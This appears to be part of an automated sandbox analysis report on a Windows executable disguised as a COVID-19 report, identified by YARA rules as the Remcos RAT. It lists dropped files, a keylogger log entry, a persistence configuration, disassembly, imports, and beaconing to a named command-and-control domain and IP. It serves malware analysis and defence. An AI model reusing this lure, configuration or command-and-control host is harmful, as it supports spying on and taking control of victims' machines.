                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O.........."..................d....... ....@..........................p....... ....@...@.......@.........................T......._1...........D...........c................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc..._1.......2...R..............@..@.reloc...u.......v..................@..B................................................................................................................................................................................................................................................................................................................
                                          C:\84086963\xfunubfgqn.xls
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):523
                                          Entropy (8bit):5.382025219937329
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F505C30D2DFD661FDCE3DAF0ECE6E52F
                                          SHA1:2F6B4AF22457FA04606FD8C519D8F88048D73635
                                          SHA-256:74DF8F0F6EAADFE4771625801D0341C511B693A7ABE6720A35859C0C5F18EDFD
                                          SHA-512:CDF6162D8757902C6F533046CA758B0A582DFF62F66B1B23A0103800416513CF2FFECF13AA69B6F19581E95AB2824B3142D4C5DE2A9995D8058F08CFD2F3B15D
                                          Malicious:false
                                          Preview: Xl3k7Yc757RU38..61m7L3U97d4938KL9cnl76A1U026Pt32K2yh6o53Z98438t0X6a4GRDW1If5841G90T13R7g64r935qEy..6A0T80lT4y4k96iM91366fx42f3U917ZbH90762Se3a7toIw575kh19J8..0KzbZ6S3ny25O68p18b77A301b5561XVCp11b14979e18jm4vN587109543s1C3JrxXTa05y223yZ30W910WLO85364sdO9M245883Qy420L1S9803v2524G4856J01S7098wnc2ig18SZ02q7WNp25z2bjz0eW17..33j1N68TrhQND97Sg2OUH3o5d2wpMfZ11rd443600E669K0gxk1zB2OJrz4o7EeU07F27Y9Or15UQeok40253t1097G1A6M9J1s9948XD6..f43432E4RMYl7r8r4o38F7E45c4307U7I5650WnpF1t9346713gJX0398Xp33obyEtZ57lqZK9A4P8S10t9gyHdK9UYu..
                                          C:\84086963\xgtowcke.icm
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):522
                                          Entropy (8bit):5.4621900096684675
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CFE1BE4D6CADE1701329295E15775372
                                          SHA1:9D0885591AA3BFB6F2679950A97A34E09C10B0FF
                                          SHA-256:B0A197AD6F56B276A63F63DB6210BC2659041E12CB73D70A6E09B99550262671
                                          SHA-512:872D18ADB7DAABCC49EBAB8E2A3BFA949C72FDBA28B52D2D28DEC0C0F45464DD78B7111DF68F2210C99D6C08EB505AAB46EBE30BCB759775BD2BFBA2CD8B5508
                                          Malicious:false
                                          Preview: J420v1DE6s14jcud3..p3k6fk52A4876Gn05C4cPa2o4j850274n9XV98T0v5Xb4G15q64C8f21x3fJthl36los33wCAsrYhu5Dn1q3PI07GxOaUZZ9D58z959Us9Iq1aW825z708YJ8TWy9az..2uYBEArIegY97OJ1b1aR613Of1HV866..m35B4184004z5LCM76Z6M0N20614723Uf0PjQ6v6637yM7K6F936tdz019Sazi2e15X8z7f56D644dRJ1X7M19P5A09lR1B55199wO5F161iC99y979f..03vJj2WDu44rY9av6y7b5300z6h8696r03X9e4M1141Sosrz9z96961X5y3cAZ3bj7qW79127z104M09O..87v58C0u2Lh7pq9290Y8f9OX8m2g4W872763PpIz5R052GIFY9i1k9z5L086J45243Pz55L9k5b57SLmX9697hpHn7Q2y1ntj34jK9L7JaMo5UV2l3R656b11p3SpPA7tvF2Q9nR8c..
                                          C:\Users\user\AppData\Roaming\remcos\logs.dat
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):85
                                          Entropy (8bit):4.764829689324031
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4F045072EA548C517A12DC2883656D0F
                                          SHA1:D4A47C53587FF02226500A0B3A2C205092336C72
                                          SHA-256:45E73F9C9CEBC31B9CD6989B06BEBB895496BD572B359EB7C422D502A5527948
                                          SHA-512:6F8FBCACE7B8DC3F086CA6A4BBE55F488B4F3E6B1883A8725D3433EFB8DA6DC0C59955D31B21F7413BF65523AB31FD6A4DD8E4BB8806D28FE2EDDE7E5C1F28EC
                                          Malicious:false
                                          Preview: ..[2021/09/07 15:30:42 Offline Keylogger Started]....[ Run ]....[ Program Manager ]..
                                          C:\Users\user\temp\keiv.bmp
                                          Process:C:\84086963\xdhqeufpq.pif
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):90
                                          Entropy (8bit):5.121205913704214
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FF24EA6595DD486113A7C13A8731CFFB
                                          SHA1:FF510F41E9FF029BD237A85FA804DA7D3CED776E
                                          SHA-256:F8322186B2997F00482C6B192456D13662441B5B1065820D9BA56CA841796DAE
                                          SHA-512:B9805FD92796690037659BF9FDD09B07C9A1285A84C7BF15EF49449E277E7BF45EA5B26ECEB77BC5050AC32E86742C1716F9D4ED6CD92B63030DED1C1D72820B
                                          Malicious:false
                                          Preview: [S3tt!ng]..stpth=%homedrive%..Key=WindowsUpdate..Dir3ctory=84086963..ExE_c=xdhqeufpq.pif..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.456525029612192
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Covid-19 Data Report Google Checklist.exe
                                          File size:1218155
                                          MD5:704320b0ab5d2f24ec101cfda39589c7
                                          SHA1:286e65e21dc0ab4199484c948527bb3d20c4039b
                                          SHA256:64c32d82c0dd8612a93831055d36ba9b2767c213b2706212545fc80b34a4d900
                                          SHA512:e497642e91992dbb8c53f86998c05ae859229206e5a8ffb6a99c8b817d12b5654bd054b207f69be8e0f3f760a7254a6fed9d73b938d92c2602dd11a2e53f8b56
                                          SSDEEP:24576:5AOcZ9Z++WzSRUHcjOtgzDJ1ZoRWS+TUI3fO+veifWtU:z8W2RUHsWgzDHyRWSJkzUU
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

                                          File Icon

                                          Icon Hash:76ececccd6c2fad2

                                          Static PE Info

                                          General

                                          Entrypoint:0x41e1f9
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:1
                                          File Version Major:5
                                          File Version Minor:1
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:1
                                          Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                                          Entrypoint Preview

                                          Instruction
                                          call 00007F24C0B9479Fh
                                          jmp 00007F24C0B94193h
                                          cmp ecx, dword ptr [0043D668h]
                                          jne 00007F24C0B94305h
                                          ret
                                          jmp 00007F24C0B94915h
                                          ret
                                          and dword ptr [ecx+04h], 00000000h
                                          mov eax, ecx
                                          and dword ptr [ecx+08h], 00000000h
                                          mov dword ptr [ecx+04h], 00433068h
                                          mov dword ptr [ecx], 00434284h
                                          ret
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          push dword ptr [ebp+08h]
                                          mov esi, ecx
                                          call 00007F24C0B87711h
                                          mov dword ptr [esi], 00434290h
                                          mov eax, esi
                                          pop esi
                                          pop ebp
                                          retn 0004h
                                          and dword ptr [ecx+04h], 00000000h
                                          mov eax, ecx
                                          and dword ptr [ecx+08h], 00000000h
                                          mov dword ptr [ecx+04h], 00434298h
                                          mov dword ptr [ecx], 00434290h
                                          ret
                                          lea eax, dword ptr [ecx+04h]
                                          mov dword ptr [ecx], 00434278h
                                          push eax
                                          call 00007F24C0B974ADh
                                          pop ecx
                                          ret
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          mov esi, ecx
                                          lea eax, dword ptr [esi+04h]
                                          mov dword ptr [esi], 00434278h
                                          push eax
                                          call 00007F24C0B97496h
                                          test byte ptr [ebp+08h], 00000001h
                                          pop ecx
                                          je 00007F24C0B9430Ch
                                          push 0000000Ch
                                          push esi
                                          call 00007F24C0B938CFh
                                          pop ecx
                                          pop ecx
                                          mov eax, esi
                                          pop esi
                                          pop ebp
                                          retn 0004h
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 0Ch
                                          lea ecx, dword ptr [ebp-0Ch]
                                          call 00007F24C0B9426Eh
                                          push 0043A410h
                                          lea eax, dword ptr [ebp-0Ch]
                                          push eax
                                          call 00007F24C0B96B95h
                                          int3
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 0Ch

                                          Rich Headers

                                          Programming Language:
                                          • [ C ] VS2008 SP1 build 30729
                                          • [EXP] VS2015 UPD3.1 build 24215
                                          • [LNK] VS2015 UPD3.1 build 24215
                                          • [IMP] VS2008 SP1 build 30729
                                          • [C++] VS2015 UPD3.1 build 24215
                                          • [RES] VS2015 UPD3 build 24213

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3b5400x34.rdata
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3b5740x3c.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x15168.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000x210c.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x397d00x54.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x342180x40.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x320000x260.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3aaec0x120.rdata
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x305810x30600False0.589268410853data6.70021125825IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x320000xa3320xa400False0.455030487805data5.23888424127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x3d0000x238b00x1200False0.368272569444data3.83993526939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .gfids0x610000xe80x200False0.333984375data2.12166381533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x620000x151680x15200False0.214705066568data4.84974997403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x780000x210c0x2200False0.786534926471data6.61038519378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          PNG0x625240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                                          PNG0x6306c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                                          RT_ICON0x646180x10828dBase III DBT, version number 0, next free block index 40
                                          RT_DIALOG0x74e400x286dataEnglishUnited States
                                          RT_DIALOG0x750c80x13adataEnglishUnited States
                                          RT_DIALOG0x752040xecdataEnglishUnited States
                                          RT_DIALOG0x752f00x12edataEnglishUnited States
                                          RT_DIALOG0x754200x338dataEnglishUnited States
                                          RT_DIALOG0x757580x252dataEnglishUnited States
                                          RT_STRING0x759ac0x1e2dataEnglishUnited States
                                          RT_STRING0x75b900x1ccdataEnglishUnited States
                                          RT_STRING0x75d5c0x1b8dataEnglishUnited States
                                          RT_STRING0x75f140x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
                                          RT_STRING0x7605c0x446dataEnglishUnited States
                                          RT_STRING0x764a40x166dataEnglishUnited States
                                          RT_STRING0x7660c0x152dataEnglishUnited States
                                          RT_STRING0x767600x10adataEnglishUnited States
                                          RT_STRING0x7686c0xbcdataEnglishUnited States
                                          RT_STRING0x769280xd6dataEnglishUnited States
                                          RT_GROUP_ICON0x76a000x14data
                                          RT_MANIFEST0x76a140x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                          gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 7, 2021 15:30:42.257205963 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:30:43.361321926 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:43.361700058 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:30:43.365227938 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:30:43.515518904 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:43.572232008 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:43.575433016 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:30:43.780626059 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:48.577641010 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:48.581227064 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:30:48.734456062 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:53.594043970 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:53.598201990 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:30:53.750971079 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:58.610133886 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:30:58.612122059 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:30:58.766156912 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:03.623986006 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:03.625905991 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:03.780014038 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:08.634174109 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:08.641108990 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:08.804636955 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:13.641153097 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:13.644104958 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:14.627310038 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:14.728943110 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:18.743499994 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:18.746484041 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:18.899859905 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:23.759196997 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:23.762600899 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:23.915493965 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:28.777002096 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:28.779366970 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:28.927928925 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:33.787882090 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:33.847707987 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:34.629679918 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:34.776885033 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:38.802949905 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:38.805598974 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:38.958936930 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:43.817121983 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:43.819406986 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:43.971479893 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:48.824031115 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:48.825983047 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:48.979779005 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:53.839605093 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:53.843169928 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:54.006211042 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:58.843219995 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:31:58.845468044 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:31:58.998467922 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:03.856147051 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:03.866569996 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:32:04.013274908 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:08.862840891 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:08.864686012 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:32:09.017049074 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:13.866791010 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:13.869277000 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:32:14.022440910 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:18.874448061 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:18.877744913 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:32:19.032228947 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:23.879878044 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:23.882714033 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:32:24.041896105 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:28.881454945 CEST66094970779.134.225.107192.168.2.6
                                          Sep 7, 2021 15:32:28.882575989 CEST497076609192.168.2.679.134.225.107
                                          Sep 7, 2021 15:32:29.036787033 CEST66094970779.134.225.107192.168.2.6

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 7, 2021 15:30:14.854623079 CEST5837753192.168.2.68.8.8.8
                                          Sep 7, 2021 15:30:14.890289068 CEST53583778.8.8.8192.168.2.6
                                          Sep 7, 2021 15:30:14.948640108 CEST5507453192.168.2.68.8.8.8
                                          Sep 7, 2021 15:30:14.984313011 CEST53550748.8.8.8192.168.2.6
                                          Sep 7, 2021 15:30:16.846812963 CEST5451353192.168.2.68.8.8.8
                                          Sep 7, 2021 15:30:16.881508112 CEST53545138.8.8.8192.168.2.6
                                          Sep 7, 2021 15:30:42.191059113 CEST6204453192.168.2.68.8.8.8
                                          Sep 7, 2021 15:30:42.239233017 CEST53620448.8.8.8192.168.2.6
                                          Sep 7, 2021 15:30:49.219933033 CEST6379153192.168.2.68.8.8.8
                                          Sep 7, 2021 15:30:49.261888981 CEST53637918.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:09.213530064 CEST6426753192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:09.238667965 CEST53642678.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:09.791408062 CEST4944853192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:09.841351986 CEST53494488.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:10.419001102 CEST6034253192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:10.454447985 CEST53603428.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:10.637027979 CEST6134653192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:10.669512033 CEST53613468.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:11.052407026 CEST5177453192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:11.085870981 CEST53517748.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:11.540996075 CEST5602353192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:11.573235989 CEST53560238.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:12.011221886 CEST5838453192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:12.035969019 CEST53583848.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:12.633579969 CEST6026153192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:12.669027090 CEST53602618.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:14.451152086 CEST5606153192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:14.479424000 CEST53560618.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:16.274401903 CEST5833653192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:16.309911966 CEST53583368.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:16.978715897 CEST5378153192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:17.007855892 CEST53537818.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:24.735045910 CEST5406453192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:24.769879103 CEST53540648.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:44.123038054 CEST5281153192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:44.158538103 CEST53528118.8.8.8192.168.2.6
                                          Sep 7, 2021 15:31:59.073514938 CEST5529953192.168.2.68.8.8.8
                                          Sep 7, 2021 15:31:59.106215000 CEST53552998.8.8.8192.168.2.6
                                          Sep 7, 2021 15:32:01.058887959 CEST6374553192.168.2.68.8.8.8
                                          Sep 7, 2021 15:32:01.108550072 CEST53637458.8.8.8192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 7, 2021 15:30:42.191059113 CEST192.168.2.68.8.8.80x9385Standard query (0)cato.fingusti.clubA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 7, 2021 15:30:42.239233017 CEST8.8.8.8192.168.2.60x9385No error (0)cato.fingusti.club79.134.225.107A (IP address)IN (0x0001)

                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: Covid-19 Data Report Google Checklist.exe PID: 6380 Parent PID: 6128

                                          General

                                          Start time:15:30:21
                                          Start date:07/09/2021
                                          Path:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe'
                                          Imagebase:0xc30000
                                          File size:1218155 bytes
                                          MD5 hash:704320B0AB5D2F24EC101CFDA39589C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: xdhqeufpq.pif PID: 6624 Parent PID: 6380

                                          General

                                          Start time:15:30:31
                                          Start date:07/09/2021
                                          Path:C:\84086963\xdhqeufpq.pif
                                          Wow64 process (32bit):true
                                          Commandline:'C:\84086963\xdhqeufpq.pif' fqficjon.emu
                                          Imagebase:0x12f0000
                                          File size:661744 bytes
                                          MD5 hash:957FCFF5374F7A5EE128D32C976ADAA5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.386707521.0000000004991000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.386521048.0000000004971000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.388439070.0000000004971000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.388390294.00000000049D0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.388650467.00000000048A8000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.388336916.00000000049D0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.386874226.00000000049F2000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.388305317.0000000004991000.00000004.00000001.sdmp, Author: Joe Security
